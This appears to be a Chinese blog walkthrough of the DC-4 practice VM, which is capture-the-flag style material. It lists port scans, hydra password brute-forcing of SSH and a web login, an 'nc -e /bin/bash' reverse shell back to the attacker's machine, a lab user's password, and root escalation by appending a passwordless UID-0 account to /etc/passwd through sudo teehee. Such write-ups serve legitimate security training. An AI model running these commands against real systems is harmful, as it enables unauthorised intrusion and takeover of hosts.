• DC-4靶机


    仅供个人娱乐

    靶机信息

    下载地址:http://www.five86.com/downloads/DC-4.zip

    一、主机扫描

    arp-scan -l

    nmap -p 1-65535 -A -sV 192.168.17.130

    二、信息收集

    dirb http://192.168.17.130

    三、漏洞查找和利用

    爆破ssh

    hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130

    字典设置太大了。

    web页面

    爆破

    或者使用hydra 爆破密码

    hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.17.130 http-post-form "/login.php:username=^USER^ password=^PASS^:S=logout" -F

    登录成功

    信息收集

    抓包

    可以反弹shell命令:

    nc -e /bin/bash 192.168.17.129 4444

    python -c 'import pty;pty.spawn("/bin/bash")'

    信息收集

    复制 作为字典

    ssh登录

    查看信息

    切换账户登录[charles:^xHhA&hvim0y]

    查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

    信息收集

    第一种获取权限方法

    添加账户

    echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd

    tail -n 5 /etc/passwd

    su test



  • 相关阅读:
    使用Mysql慢查询日志对有效率问题的SQL进行监控
    wampserver3.1.0安装及配置
    Composer
    HTML5 本地存储(Web Storage)
    HTML5 元素拖动
    生成验证码
    git 基础命令
    POI使用流程
    JDK各版本新特性总结
    dubbo+zookeeper项目搭建
  • 原文地址:https://www.cnblogs.com/bingtang123/p/12838408.html
Copyright © 2020-2023  润新知